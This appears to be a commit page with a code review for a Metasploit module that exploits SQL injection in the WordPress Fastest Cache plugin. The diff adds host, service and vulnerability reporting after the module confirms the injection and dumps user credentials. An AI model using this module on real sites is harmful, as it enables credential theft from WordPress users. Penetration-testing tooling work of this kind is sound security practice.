Add report_host, report_service and report_vuln
Chocapikk committed Oct 3, 2024
1 parent 69074bb commit d295ed0
Showing 1 changed file with 28 additions and 5 deletions.
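--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -47,7 +47,7 @@ def initialize(info = {})
 ]
 end
 
-def run_host(_ip)
+def run_host(ip)
 print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")
 
 random_number = Rex::Text.rand_text_numeric(4..8)
@@ -63,10 +63,33 @@ def run_host(_ip)
 fail_with Failure::Unreachable, 'Connection failed' unless res
 end
 
-fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
-print_good('Target is vulnerable to SQLi!')
+if @sqli.test_vulnerable
+print_good('Target is vulnerable to SQLi!')
 
-wordpress_sqli_initialize(@sqli)
-wordpress_sqli_get_users_credentials(datastore['COUNT'])
+wordpress_sqli_initialize(@sqli)
+wordpress_sqli_get_users_credentials(datastore['COUNT'])
+
+report_host(host: ip)
+
+report_service(
+host: ip,
+port: rport,
+proto: 'tcp',
+name: fullname,
+info: description.strip
+)
+
+report_vuln(
+host: ip,
+port: rport,
+proto: 'tcp',
+name: fullname,
+refs: references,
+info: description.strip
+)
+
+else
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.')
+end
 end
 end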
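Review bot: In the new `report_service` call, `name: fullname` stores the module's path in the field that normally holds the service protocol, so the workspace's service table gets a module name where `http` or `https` is expected. Assuming the HTTP client mixin's `ssl` helper is in scope (the includes are outside this hunk), `name: (ssl ? 'https' : 'http')` would keep that table consistent with other HTTP scanners. The `report_host(host: ip)` call looks redundant, since both `report_service` and `report_vuln` already pass `host:`. All three reporting calls also sit after `wordpress_sqli_get_users_credentials`, so if that step raises, the confirmed finding is presumably never recorded; moving `report_vuln` directly under `print_good` would log it first.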
